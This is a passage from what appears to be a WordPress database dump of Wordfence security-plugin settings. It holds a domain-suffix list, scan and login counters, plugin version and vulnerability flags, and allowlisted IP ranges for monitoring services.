ow|ibm|ice|icu|ifm|inc|ing|ink|int|ist|itv|jcb|jio|jll|jmp|jnj|jot|joy|kfh|kia|kim|kpn|krd|lat|law|lds|llc|llp|lol|lpl|ltd|man|map|mba|med|men|mil|mit|mlb|mls|mma|moe|moi|mom|mov|msd|mtn|mtr|nab|nba|nec|new|nfl|ngo|nhk|now|nra|nrw|ntt|nyc|obi|off|one|ong|onl|ooo|ott|ovh|pay|pet|phd|pid|pin|pnc|pro|pru|pub|pwc|qvc|red|ren|ril|rio|rip|run|rwe|sap|sas|sbi|sbs|sca|scb|ses|sew|sex|sfr|ski|sky|soy|spa|srl|stc|tab|tax|tci|tdk|tel|thd|tjx|top|trv|tui|tvs|ubs|uno|uol|ups|vet|vig|vin|vip|wed|win|wme|wow|wtc|wtf|xin|xxx|xyz|you|yun|zip|ac|ad|ae|af|ag|ai|al|am|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cu|cv|cw|cx|cy|cz|de|dj|dk|dm|do|dz|ec|ee|eg|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|me|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|rs|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr|ss|st|su|sv|sx|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tr|tt|tv|tw|tz|ua|ug|uk|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|za|zm|zw|aarp|able|adac|aero|akdn|ally|amex|arab|arpa|alstom|army|arte|asda|asia|audi|auto|baby|band|bank|bbva|beer|best|bike|bing|blog|blue|bofa|bond|aetna|book|buzz|cafe|call|camp|cars|casa|case|cash|actor|care|adult|cbre|cern|chat|citi|city|club|cool|cymru|alsace|cyou|cards|coop|data|date|dclk|link|live|loan|loft|mini|mint|amfam|chase|cisco|mobi|apple|limo|amica|like|archi|cheap|citic|click|life|codes|crown|deal|dell|game|lidl|love|cloud|coach|ltda|luxe|maif|meme|media|meet|menu|miami|moda|news|next|lotte|lotto|moto|name|navy|boats|nexus|alfaromeo|nico|nike|open|nikon|ninja|page|deals|nokia|ollo|alibaba|pars|bosch|airbus|nowtv|pccw|pink|play|plus|beats|bible|bingo|delta|airtel|baidu|black|lilly|linde|movie|ping|lipsy|money|pics|lixil|loans|locus|pohl|alipay|prod|prof|qpon|raid|read|dabur|dance|pizza|porn|post|phone|photo|place|poker|praxi|press|prime|promo|shia|audio|autos|azure|build|osaka|paris|parts|party|quest|radio|allstate|omega|allfinanz|canon|mango|vana|shoes|shop|show|silk|sina|site|skin|sncf|sohu|song|sony|skype|sling|smart|smile|solar|space|spot|star|sport|stada|store|study|style|surf|talk|sucks|swiss|tatar|taxi|team|teva|tiaa|tips|tires|tirol|tmall|today|tokyo|tools|abarth|abbott|tech|toray|video|abbvie|agency|total|tours|town|toys|trade|vegas|africa|trust|tube|tunes|tushu|ubank|amazon|duck|audible|avianca|brother|dvag|broker|academy|camera|coffee|auspost|channel|dish|author|clinic|docs|earth|anquan|aramco|career|casino|center|chanel|email|boston|edeka|chrome|church|circle|claims|banamex|abudhabi|auction|bananarepublic|comsec|bugatti|accountants|condos|fage|careers|desi|caravan|diet|capital|erni|coupon|dubai|epson|cruise|dunlop|dupont|durban|emerck|expert|accenture|associates|estate|events|attorney|credit|athleta|energy|accountant|dentist|fail|fans|fiat|beauty|fast|fish|florist|food|ferrero|fire|flir|dental|farm|fido|film|ford|frogans|fujitsu|ggee|final|finance|free|fund|gbiz|gent|gift|bayern|bentley|flowers|gmbh|ferrari|gallery|gallo|games|goog|bestbuy|guge|bharti|faith|gold|golf|guru|hair|gifts|futbol|haus|berlin|family|farmers|fashion|hdfc|fedex|design|help|here|hgtv|gives|horse|barclays|forex|green|gripe|barclaycard|gmail|barcelona|gucci|flickr|flights|globo|group|guide|host|honda|hsbc|bostik|drive|glade|glass|homes|hyatt|icbc|forum|booking|immo|yoga|house|ieee|ikano|imdb|lgbt|work|abogado|works|world|doctor|xerox|basketball|zara|zero|bauhaus|dating|datsun|dealer|degree|yahoo|direct|fishing|xbox|fitness|bargains|baseball|education|zone|barefoot|forsale|gallup|kiwi|contact|kddi|land|visa|koeln|google|jprs|kaufen|kinder|kindle|kosher|kpmg|kred|lego|luxury|madrid|maison|makeup|market|mattel|monash|stream|studio|supply|suzuki|swatch|sydney|taipei|grocery|unicom|android|tattoo|compare|target|company|taobao|viva|vivo|gratis|lexus|volvo|garden|global|legal|voto|lease|vote|george|giving|kyoto|corsica|juegos|lamer|lefrak|london|vodka|shouji|coupons|viajes|viking|villas|vision|voting|voyage|country|courses|lancia|latino|lawyer|living|locker|mobile|soccer|social|tennis|virgin|wine|zappos|agakhan|charity|college|cologne|comcast|airforce|chintai|citadel|clubmed|cooking|cruises|digital|domains|exposed|express|genting|godaddy|americanexpress|americanfamily|cricket|guitars|hermes|itau|hiphop|hitachi|irish|watch|weber|hockey|holiday|hotels|hughes|info|jaguar|java|nissan|nissay|oracle|pfizer|photos|physio|pictet|webcam|weibo|hamburg|hosting|afamilycompany|intuit|wiki|health|wien|imamat|insure|mormon|weir|hangout|norton|nowruz|office|olayan|online|orange|otsuka|toyota|travel|hoteles|jeep|jetzt|monster|amsterdam|juniper|lanxess|lasalle|latrobe|analytics|hyundai|jobs|leclerc|limited|lincoln|apartments|joburg|moscow|wales|museum|racing|tienda|xihuan|yandex|hotmail|ismaili|aquarelle|quebec|wang|nagoya|jewelry|natura|kitchen|mutual|markets|netflix|network|oldnavy|philips|tjmaxx|komatsu|okinawa|politie|tkmaxx|yachts|netbank|pioneer|walter|lacaixa|organic|origins|vuelos|neustar|realtor|shell|boutique|bradesco|broadway|budapest|builders|business|capetown|catering|walmart|catholic|christmas|cipriani|computer|capitalone|shiksha|wanggou|cityeats|cleaning|clinique|clothing|commbank|democrat|diamonds|discount|community|discover|download|engineer|calvinklein|directory|engineering|enterprises|ericsson|equipment|construction|delivery|deloitte|consulting|creditcard|cuisinella|contractors|creditunion|cookingchannel|theatre|tickets|toshiba|trading|watches|cancerresearch|tiffany|weather|brussels|windows|winners|xfinity|yamaxun|youtube|zuerich|etisalat|whoswho|exchange|wedding|feedback|frontier|goodyear|website|fidelity|firmdale|grainger|graphics|guardian|firestone|football|frontdoor|furniture|hdfcbank|goldpoint|foundation|fresenius|foodnetwork|helsinki|eurovision|extraspace|fairwinds|healthcare|holdings|financial|ipiranga|homedepot|homegoods|homesense|hospital|insurance|immobilien|industries|infiniti|hisamitsu|institute|investments|international|istanbul|macys|rmit|bnpparibas|rent|bloomberg|reise|reit|rest|rich|room|rsvp|rehab|ruhr|safe|ricoh|sale|rocks|rodeo|rugby|blackfriday|blockbuster|reisen|salon|sarl|save|saxo|boehringer|repair|jpmorgan|kerryhotels|kerrylogistics|realty|report|review|rogers|school|recipes|safety|sakura|rentals|sener|rocher|reviews|rexroth|ryukyu|seven|samsung|sexy|sharp|shaw|select|singles|staples|storage|support|surgery|saarland|temasek|samsclub|sandvik|sanofi|schmidt|systems|schaeffler|schule|realestate|schwarz|science|services|shopping|showtime|softbank|software|scjohnson|sandvikcoromant|scot|search|seat|secure|security|seek|shangrila|solutions|stcgroup|statebank|statefarm|stockholm|scholarships|kerryproperties|theater|lighting|lundbeck|marriott|maserati|mckinsey|memorial|kuokgroup|marketing|marshalls|merckmsd|mortgage|observer|melbourne|partners|property|yokohama|lancaster|lifestyle|xn--90ae|landrover|pharmacy|pictures|plumbing|reliance|microsoft|passagens|supplies|xn--l1acc|nextdirect|panasonic|redstone|xn--90ais|xn--c1avg|xn--node|mitsubishi|olayangroup|photography|pramerica|xn--ngbrx|xn--nqv7f|yodobashi|management|properties|xn--d1alf|xn--qxam|republican|restaurant|tatamotors|xn--e1a4c|prudential|richardli|xn--fhbei|xn--p1acf|xn--tckwe|xn--vhquv|protection|xn--p1ai|xn--qxa6a|swiftcover|technology|training|ventures|vacations|vanguard|vlaanderen|woodside|bridgestone|productions|university|verisign|travelers|volkswagen|xn--fiq64b|xn--fiqs8s|xn--fiqz9s|xn--wgbh1c|lamborghini|motorcycles|playstation|progressive|xn--unup4y|redumbrella|williamhill|xn--11b4c3d|xn--1ck2e1b|xn--1qqw23a|xn--2scrj9c|xn--30rr7y|xn--pssy2u|xn--q7ce6a|xn--3bst00m|xn--3ds443g|xn--3hcrj9c|xn--3pxu8k|xn--o3cw4h|xn--42c2d9a|xn--mxtq1m|xn--wgbl6a|xn--45brj9c|xn--45q11c|xn--4gbrim|xn--9et52u|xn--czrs0t|xn--kput3i|xn--55qw42g|xn--55qx5d|xn--5tzm5g|xn--6frz82g|xn--80ao21a|xn--80aswg|xn--90a3ac|xn--9dbq2a|xn--9krt00a|xn--c2br7g|xn--cck2b3b|xn--cg4bki|xn--czr694b|xn--czru2d|xn--d1acj3b|xn--efvy88h|xn--fjq720a|xn--flw351e|xn--g2xx48c|xn--y9a3aq|xn--fct429k|xn--gecrj9c|xn--jvr189m|xn--45br5cyl|xn--4dbrk0ce|xn--80adxhks|xn--80asehdb|xn--8y0a063a|xn--gckr3f0f|xn--gk3at1e|xn--rhqv96g|xn--rovu88b|xn--3e0b707e|xn--xhq521b|travelchannel|wolterskluwer|xn--s9brj9c|xn--ses554g|lplfinancial|xn--qcka1pmc|xn--t60b56a|versicherung|lifeinsurance|xn--vuq861b|xn--w4rs40l|xn--cckwcxetd|xn--zfr164b|weatherchannel|xn--80aqecdr1a|xn--eckvdtc9d|northwesternmutual|xn--fiq228c5hs|xn--fpcrj9c3d|travelersinsurance|xn--3oq18vl8pn36a|xn--fzc2c9e2c|xn--54b7fta0cc|xn--6qq986b3xl|xn--b4w605ferd|xn--fzys8d69uvgm|xn--tiq49xqyj|xn--ygbi2ammx|xn--bck1b9a5dre4c|xn--h2brj9c|xn--clchc0ea0b2g2a9gcd|xn--q9jyb4c|xn--yfro4i67o|xn--h2breg3eve|xn--h2brj9c8c|xn--io0a7i|xn--hxt814e|xn--j1aef|xn--j1amh|xn--imr513n|xn--j6w193g|xn--kprw13d|xn--kpry57d|xn--mgbbh1a|xn--mgb9awbf|xn--jlq480n2rg|xn--mgba3a3ejt|xn--lgbbat1ad8j|xn--mgbpl2fh|xn--jlq61u9w7b|xn--mgbayh7gpa|xn--mgbbh1a71e|xn--mgbca7dzdo|xn--mgba3a4f16a|xn--mgbab2bd|xn--mgbaam7a8h|xn--mgbaakc7dvf|xn--mgbah1a3hjkrd|xn--mgbai9azgqp6j|xn--mgbc0a9azcg|xn--mgba7c0bbn0a|xn--mgbgu82a|xn--mgbcpq6gpa1a|xn--mgbt3dhd|xn--mgberp4a5d4ar|xn--ngbc5azd|xn--kcrx77d1x4a|xn--mgbtx2b|xn--i1b6b1a6a2e|xn--mix891f|xn--nyqy26a|xn--otu796d|xn--mk1bu44c|xn--mgbi4ecexp|xn--ngbe9e0a|xn--mgbx4cd0ab|xn--nqv7fs00ema|xn--ogbpf8fl|xn--pgbs0dh|xn--rvc1e0am3e|xn--5su34j936bgsg|xn--w4r85el8fhu5dnra|xn--vermgensberater-ctb|xn--vermgensberatung-pwb|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|','yes'),('tldlistHash','3694aa48ec18a722435a817d284b52e282d032d11ca43c36e94d9e03b5ca922a','yes'),('total503s','33','yes'),('totalAlertsSent','7','yes'),('totalIPsBlocked','14','yes'),('totalIPsLocked','3','yes'),('totalLoginHits','6894','yes'),('totalLogins','3','yes'),('totalScansRun','81','yes'),('touppBypassNextCheck','0','yes'),('touppPromptNeeded','','yes'),('vulnerabilities_plugin','a:5:{i:0;a:5:{s:4:\"slug\";s:7:\"akismet\";s:9:\"toVersion\";s:6:\"4.1.10\";s:11:\"fromVersion\";s:5:\"4.1.9\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:1;a:5:{s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:9:\"toVersion\";s:5:\"4.4.9\";s:11:\"fromVersion\";s:5:\"4.4.8\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:2;a:5:{s:4:\"slug\";s:9:\"wordfence\";s:9:\"toVersion\";s:5:\"7.5.5\";s:11:\"fromVersion\";s:5:\"7.5.4\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:3;a:5:{s:4:\"slug\";s:9:\"wp-cerber\";s:9:\"toVersion\";s:5:\"8.9.3\";s:11:\"fromVersion\";s:5:\"8.8.5\";s:10:\"vulnerable\";b:1;s:4:\"link\";s:73:\"https://wpvulndb.com/vulnerabilities/0c06abf1-f01f-4268-a105-02b1327427cf\";}i:4;a:4:{s:4:\"slug\";s:11:\"hello-dolly\";s:11:\"fromVersion\";s:5:\"1.7.2\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}}','yes'),('vulnerabilities_theme','a:4:{i:0;a:4:{s:4:\"slug\";s:13:\"magazine-hoot\";s:9:\"toVersion\";s:6:\"1.9.19\";s:11:\"fromVersion\";s:6:\"1.9.15\";s:10:\"vulnerable\";b:0;}i:1;a:4:{s:4:\"slug\";s:14:\"twentynineteen\";s:9:\"toVersion\";s:3:\"2.1\";s:11:\"fromVersion\";s:3:\"2.0\";s:10:\"vulnerable\";b:0;}i:2;a:4:{s:4:\"slug\";s:12:\"twentytwenty\";s:9:\"toVersion\";s:3:\"1.8\";s:11:\"fromVersion\";s:3:\"1.7\";s:10:\"vulnerable\";b:0;}i:3;a:4:{s:4:\"slug\";s:15:\"twentytwentyone\";s:9:\"toVersion\";s:3:\"1.4\";s:11:\"fromVersion\";s:3:\"1.3\";s:10:\"vulnerable\";b:0;}}','yes'),('wafAlertInterval','600','yes'),('wafAlertOnAttacks','1','yes'),('wafAlertThreshold','100','yes'),('wafAlertWhitelist','','yes'),('waf_status','enabled','yes'),('wfKillRequested','0','no'),('wfPeakMemory','35655680','no'),('wfScanStartVersion','5.7.2','yes'),('wfsd_engine','','no'),('wfStatusStartMsgs','a:2:{i:0;s:0:\"\";i:1;s:0:\"\";}','yes'),('wf_scanLastStatusTime','0','yes'),('wf_scanRunning','','yes'),('wf_summaryItems','a:8:{s:12:\"scannedPosts\";i:0;s:15:\"scannedComments\";i:0;s:12:\"scannedFiles\";i:0;s:14:\"scannedPlugins\";i:0;s:13:\"scannedThemes\";i:0;s:12:\"scannedUsers\";i:0;s:11:\"scannedURLs\";i:0;s:10:\"lastUpdate\";i:1629713828;}','yes'),('whitelisted','','yes'),('whitelistedServices','{}','yes'),('whitelistHash','bf3d76dc05caf8623cb3fe01c1fc9e308e2f2ea37b826937d850fde361cdefd4','yes'),('whitelistPresets','{\"wordfence\":{\"n\":\"Wordfence\",\"h\":true,\"d\":true,\"f\":true,\"r\":[\"54.68.32.247\",\"69.46.36.0\\/27\",\"2605:2400:0104:0100::\\/56\"]},\"sucuri\":{\"n\":\"Sucuri\",\"d\":true,\"r\":[\"97.74.127.171\",\"69.164.203.172\",\"173.230.128.135\",\"66.228.34.49\",\"66.228.40.185\",\"50.116.36.92\",\"50.116.36.93\",\"50.116.3.171\",\"198.58.96.212\",\"50.116.63.221\",\"192.155.92.112\",\"192.81.128.31\",\"198.58.106.244\",\"192.155.95.139\",\"23.239.9.227\",\"198.58.112.103\",\"192.155.94.43\",\"162.216.16.33\",\"173.255.233.124\",\"173.255.233.124\",\"192.155.90.179\",\"50.116.41.217\",\"192.81.129.227\",\"198.58.111.80\",\"162.216.19.183\"]},\"facebook\":{\"n\":\"Facebook\",\"d\":true,\"r\":[\"69.63.176.0\\/20\",\"66.220.144.0\\/20\",\"66.220.144.0\\/21\",\"69.63.184.0\\/21\",\"69.63.176.0\\/21\",\"74.119.76.0\\/22\",\"69.171.255.0\\/24\",\"173.252.64.0\\/18\",\"69.171.224.0\\/19\",\"69.171.224.0\\/20\",\"103.4.96.0\\/22\",\"69.63.176.0\\/24\",\"173.252.64.0\\/19\",\"173.252.70.0\\/24\",\"31.13.64.0\\/18\",\"31.13.24.0\\/21\",\"66.220.152.0\\/21\",\"66.220.159.0\\/24\",\"69.171.239.0\\/24\",\"69.171.240.0\\/20\",\"31.13.64.0\\/19\",\"31.13.64.0\\/24\",\"31.13.65.0\\/24\",\"31.13.67.0\\/24\",\"31.13.68.0\\/24\",\"31.13.69.0\\/24\",\"31.13.70.0\\/24\",\"31.13.71.0\\/24\",\"31.13.72.0\\/24\",\"31.13.73.0\\/24\",\"31.13.74.0\\/24\",\"31.13.75.0\\/24\",\"31.13.76.0\\/24\",\"31.13.77.0\\/24\",\"31.13.96.0\\/19\",\"31.13.66.0\\/24\",\"173.252.96.0\\/19\",\"69.63.178.0\\/24\",\"31.13.78.0\\/24\",\"31.13.79.0\\/24\",\"31.13.80.0\\/24\",\"31.13.82.0\\/24\",\"31.13.83.0\\/24\",\"31.13.84.0\\/24\",\"31.13.85.0\\/24\",\"31.13.86.0\\/24\",\"31.13.87.0\\/24\",\"31.13.88.0\\/24\",\"31.13.89.0\\/24\",\"31.13.90.0\\/24\",\"31.13.91.0\\/24\",\"31.13.92.0\\/24\",\"31.13.93.0\\/24\",\"31.13.94.0\\/24\",\"31.13.95.0\\/24\",\"69.171.253.0\\/24\",\"69.63.186.0\\/24\",\"31.13.81.0\\/24\",\"179.60.192.0\\/22\",\"179.60.192.0\\/24\",\"179.60.193.0\\/24\",\"179.60.194.0\\/24\",\"179.60.195.0\\/24\",\"185.60.216.0\\/22\",\"45.64.40.0\\/22\",\"185.60.216.0\\/24\",\"185.60.217.0\\/24\",\"185.60.218.0\\/24\",\"185.60.219.0\\/24\",\"129.134.0.0\\/16\",\"157.240.0.0\\/16\",\"157.240.8.0\\/24\",\"157.240.0.0\\/24\",\"157.240.1.0\\/24\",\"157.240.2.0\\/24\",\"157.240.3.0\\/24\",\"157.240.4.0\\/24\",\"157.240.5.0\\/24\",\"157.240.6.0\\/24\",\"157.240.7.0\\/24\",\"157.240.9.0\\/24\",\"157.240.10.0\\/24\",\"157.240.16.0\\/24\",\"157.240.19.0\\/24\",\"157.240.11.0\\/24\",\"157.240.12.0\\/24\",\"157.240.13.0\\/24\",\"157.240.14.0\\/24\",\"157.240.15.0\\/24\",\"157.240.17.0\\/24\",\"157.240.18.0\\/24\",\"157.240.20.0\\/24\",\"157.240.21.0\\/24\",\"157.240.22.0\\/24\",\"157.240.23.0\\/24\",\"157.240.0.0\\/17\",\"69.171.250.0\\/24\",\"157.240.24.0\\/24\",\"157.240.25.0\\/24\",\"199.201.64.0\\/24\",\"199.201.65.0\\/24\",\"199.201.64.0\\/22\",\"204.15.20.0\\/22\",\"157.240.192.0\\/24\",\"129.134.0.0\\/17\",\"204.15.20.0\\/22\",\"69.63.176.0\\/20\",\"69.63.176.0\\/21\",\"69.63.184.0\\/21\",\"66.220.144.0\\/20\",\"69.63.176.0\\/20\",\"2620:0:1c00::\\/40\",\"2a03:2880::\\/32\",\"2a03:2880:fffe::\\/48\",\"2a03:2880:ffff::\\/48\",\"2620:0:1cff::\\/48\",\"2a03:2880:f000::\\/48\",\"2a03:2880:f001::\\/48\",\"2a03:2880:f002::\\/48\",\"2a03:2880:f003::\\/48\",\"2a03:2880:f004::\\/48\",\"2a03:2880:f005::\\/48\",\"2a03:2880:f006::\\/48\",\"2a03:2880:f007::\\/48\",\"2a03:2880:f008::\\/48\",\"2a03:2880:f009::\\/48\",\"2a03:2880:f00a::\\/48\",\"2a03:2880:f00b::\\/48\",\"2a03:2880:f00c::\\/48\",\"2a03:2880:f00d::\\/48\",\"2a03:2880:f00e::\\/48\",\"2a03:2880:f00f::\\/48\",\"2a03:2880:f010::\\/48\",\"2a03:2880:f011::\\/48\",\"2a03:2880:f012::\\/48\",\"2a03:2880:f013::\\/48\",\"2a03:2880:f014::\\/48\",\"2a03:2880:f015::\\/48\",\"2a03:2880:f016::\\/48\",\"2a03:2880:f017::\\/48\",\"2a03:2880:f018::\\/48\",\"2a03:2880:f019::\\/48\",\"2a03:2880:f01a::\\/48\",\"2a03:2880:f01b::\\/48\",\"2a03:2880:f01c::\\/48\",\"2a03:2880:f01d::\\/48\",\"2a03:2880:f01e::\\/48\",\"2a03:2880:f01f::\\/48\",\"2a03:2880:1000::\\/36\",\"2a03:2880:2000::\\/36\",\"2a03:2880:3000::\\/36\",\"2a03:2880:4000::\\/36\",\"2a03:2880:5000::\\/36\",\"2a03:2880:6000::\\/36\",\"2a03:2880:7000::\\/36\",\"2a03:2880:f020::\\/48\",\"2a03:2880:f021::\\/48\",\"2a03:2880:f022::\\/48\",\"2a03:2880:f023::\\/48\",\"2a03:2880:f024::\\/48\",\"2a03:2880:f025::\\/48\",\"2a03:2880:f026::\\/48\",\"2a03:2880:f027::\\/48\",\"2a03:2880:f028::\\/48\",\"2a03:2880:f029::\\/48\",\"2a03:2880:f02b::\\/48\",\"2a03:2880:f02c::\\/48\",\"2a03:2880:f02d::\\/48\",\"2a03:2880:f02e::\\/48\",\"2a03:2880:f02f::\\/48\",\"2a03:2880:f030::\\/48\",\"2a03:2880:f031::\\/48\",\"2a03:2880:f032::\\/48\",\"2a03:2880:f033::\\/48\",\"2a03:2880:f034::\\/48\",\"2a03:2880:f035::\\/48\",\"2a03:2880:f036::\\/48\",\"2a03:2880:f037::\\/48\",\"2a03:2880:f038::\\/48\",\"2a03:2880:f039::\\/48\",\"2a03:2880:f03a::\\/48\",\"2a03:2880:f03b::\\/48\",\"2a03:2880:f03c::\\/48\",\"2a03:2880:f03d::\\/48\",\"2a03:2880:f03e::\\/48\",\"2a03:2880:f03f::\\/48\",\"2401:db00::\\/32\",\"2a03:2880::\\/36\",\"2803:6080::\\/32\",\"2a03:2880:f100::\\/48\",\"2a03:2880:f200::\\/48\",\"2a03:2880:f101::\\/48\",\"2a03:2880:f201::\\/48\",\"2a03:2880:f102::\\/48\",\"2a03:2880:f202::\\/48\",\"2a03:2880:f103::\\/48\",\"2a03:2880:f203::\\/48\",\"2a03:2880:f104::\\/48\",\"2a03:2880:f204::\\/48\",\"2a03:2880:f107::\\/48\",\"2a03:2880:f207::\\/48\",\"2a03:2880:f108::\\/48\",\"2a03:2880:f208::\\/48\",\"2a03:2880:f109::\\/48\",\"2a03:2880:f209::\\/48\",\"2a03:2880:f10a::\\/48\",\"2a03:2880:f20a::\\/48\",\"2a03:2880:f10b::\\/48\",\"2a03:2880:f20b::\\/48\",\"2a03:2880:f10d::\\/48\",\"2a03:2880:f20d::\\/48\",\"2a03:2880:f10e::\\/48\",\"2a03:2880:f20e::\\/48\",\"2a03:2880:f10f::\\/48\",\"2a03:2880:f20f::\\/48\",\"2a03:2880:f110::\\/48\",\"2a03:2880:f210::\\/48\",\"2a03:2880:f111::\\/48\",\"2a03:2880:f211::\\/48\",\"2a03:2880:f112::\\/48\",\"2a03:2880:f212::\\/48\",\"2a03:2880:f114::\\/48\",\"2a03:2880:f214::\\/48\",\"2a03:2880:f115::\\/48\",\"2a03:2880:f215::\\/48\",\"2a03:2880:f116::\\/48\",\"2a03:2880:f216::\\/48\",\"2a03:2880:f117::\\/48\",\"2a03:2880:f217::\\/48\",\"2a03:2880:f118::\\/48\",\"2a03:2880:f218::\\/48\",\"2a03:2880:f119::\\/48\",\"2a03:2880:f219::\\/48\",\"2a03:2880:f11a::\\/48\",\"2a03:2880:f21a::\\/48\",\"2a03:2880:f11f::\\/48\",\"2a03:2880:f21f::\\/48\",\"2a03:2880:f121::\\/48\",\"2a03:2880:f221::\\/48\",\"2a03:2880:f122::\\/48\",\"2a03:2880:f222::\\/48\",\"2a03:2880:f123::\\/48\",\"2a03:2880:f223::\\/48\",\"2a03:2880:f10c::\\/48\",\"2a03:2880:f20c::\\/48\",\"2a03:2880:f126::\\/48\",\"2a03:2880:f226::\\/48\",\"2a03:2880:f105::\\/48\",\"2a03:2880:f205::\\/48\",\"2a03:2880:f125::\\/48\",\"2a03:2880:f225::\\/48\",\"2a03:2880:f106::\\/48\",\"2a03:2880:f206::\\/48\",\"2a03:2880:f11b::\\/48\",\"2a03:2880:f21b::\\/48\",\"2a03:2880:f113::\\/48\",\"2a03:2880:f213::\\/48\",\"2a03:2880:f11c::\\/48\",\"2a03:2880:f21c::\\/48\",\"2a03:2880:f128::\\/48\",\"2a03:2880:f228::\\/48\",\"2a03:2880:f02a::\\/48\",\"2a03:2880:f12a::\\/48\",\"2a03:2880:f22a::\\/48\",\"2a03:2880:f12f::\\/48\",\"2a03:2880:f22f::\\/48\",\"2a03:2880:f11d::\\/48\",\"2a03:2880:f11e::\\/48\",\"2a03:2880:f120::\\/48\",\"2a03:2880:f124::\\/48\",\"2a03:2880:f127::\\/48\",\"2a03:2880:f129::\\/48\",\"2a03:2880:f12b::\\/48\",\"2a03:2880:f12c::\\/48\",\"2a03:2880:f12d::\\/48\",\"2a03:2880:f12e::\\/48\",\"2a03:2880:f130::\\/48\",\"2a03:2880:f131::\\/48\",\"2a03:2880:f132::\\/48\",\"2a03:2880:f133::\\/48\",\"2a03:2880:f134::\\/48\",\"2a03:2880:f135::\\/48\",\"2a03:2880:f136::\\/48\",\"2a03:2880:f137::\\/48\",\"2a03:2880:f138::\\/48\",\"2a03:2880:f139::\\/48\",\"2a03:2880:f13a::\\/48\",\"2a03:2880:f13b::\\/48\",\"2a03:2880:f13c::\\/48\",\"2a03:2880:f13d::\\/48\",\"2a03:2880:f13e::\\/48\",\"2a03:2880:f13f::\\/48\",\"2a03:2880:f21d::\\/48\",\"2a03:2880:f21e::\\/48\",\"2a03:2880:f220::\\/48\",\"2a03:2880:f224::\\/48\",\"2a03:2880:f227::\\/48\",\"2a03:2880:f229::\\/48\",\"2a03:2880:f22b::\\/48\",\"2a03:2880:f22c::\\/48\",\"2a03:2880:f22d::\\/48\",\"2a03:2880:f22e::\\/48\",\"2a03:2880:f230::\\/48\",\"2a03:2880:f231::\\/48\",\"2a03:2880:f232::\\/48\",\"2a03:2880:f233::\\/48\",\"2a03:2880:f234::\\/48\",\"2a03:2880:f235::\\/48\",\"2a03:2880:f236::\\/48\",\"2a03:2880:f237::\\/48\",\"2a03:2880:f238::\\/48\",\"2a03:2880:f239::\\/48\",\"2a03:2880:f23a::\\/48\",\"2a03:2880:f23b::\\/48\",\"2a03:2880:f23c::\\/48\",\"2a03:2880:f23d::\\/48\",\"2a03:2880:f23e::\\/48\",\"2a03:2880:f23f::\\/48\",\"2a03:2880:f0ff::\\/48\",\"2a03:2880:f1ff::\\/48\",\"2a03:2880:f2ff::\\/48\",\"2c0f:ef78:0003::\\/48\"]},\"uptimerobot\":{\"n\":\"Uptime Robot\",\"d\":true,\"r\":[\"69.162.124.224\\/28\",\"63.143.42.240\\/28\"]},\"statuscake\":{\"n\":\"StatusCake\",\"d\":true,\"r\":[\"103.194.112.70\",\"104.131.247.151\",\"104.131.248.65\",\"104.131.248.78\",\"104.156.229.24\",\"104.156.255.184\",\"104.206.168.26\",\"104.238.164.105\",\"107.150.1.135\",\"107.155.104.182\",\"107.155.108.234\",\"107.155.125.29\",\"107.161.28.219\",\"107.170.197.248\",\"107.170.219.46\",\"107.170.227.23\",\"107.170.227.24\",\"107.170.240.141\",\"107.170.53.191\",\"107.191.47.131\",\"107.191.57.237\",\"108.61.119.153\",\"108.61.162.214\",\"108.61.205.201\",\"108.61.212.141\",\"108.61.215.179\",\"125.63.48.239\",\"128.199.222.65\",\"138.197.130.232\",\"138.197.130.235\",\"138.197.140.243\",\"138.204.171.136\",\"138.68.24.115\",\"138.68.24.136\",\"138.68.24.207\",\"138.68.24.60\",\"138.68.80.10\",\"138.68.80.173\",\"139.59.15.79\",\"139.59.155.26\",\"139.59.190.241\",\"139.59.22.109\",\"139.59.26.85\",\"139.59.29.167\",\"149.154.157.61\",\"149.255.59.100\",\"151.236.10.238\",\"151.236.18.80\",\"151.80.175.223\",\"151.80.175.226\",\"154.127.60.23\",\"154.127.60.59\",\"158.255.208.76\",\"159.203.182.22\",\"159.203.182.60\",\"159.203.186.225\",\"159.203.31.18\",\"162.243.247.163\",\"162.243.71.56\",\"162.248.97.72\",\"162.253.64.104\",\"162.253.64.87\",\"176.56.230.110\",\"178.62.101.57\",\"178.62.104.137\",\"178.62.106.84\",\"178.62.109.7\",\"178.62.40.233\",\"178.62.41.44\",\"178.62.41.49\",\"178.62.41.52\",\"178.62.65.162\",\"178.62.71.227\",\"178.62.78.199\",\"178.62.80.93\",\"178.62.86.69\",\"178.73.210.99\",\"181.41.201.117\",\"181.41.214.137\",\"185.112.157.185\",\"185.12.45.70\",\"185.47.129.168\",\"185.60.135.86\",\"188.166.158.224\",\"188.166.253.148\",\"188.226.139.158\",\"188.226.158.160\",\"188.226.169.228\",\"188.226.171.58\",\"188.226.184.152\",\"188.226.185.106\",\"188.226.186.199\",\"188.226.203.84\",\"188.226.247.184\",\"188.68.238.79\",\"192.241.221.11\",\"193.124.178.54\",\"193.124.178.61\",\"193.182.144.105\",\"193.182.144.147\",\"199.167.128.80\",\"209.222.30.242\",\"213.183.56.107\",\"217.148.43.188\",\"217.148.43.202\",\"31.220.7.237\",\"37.157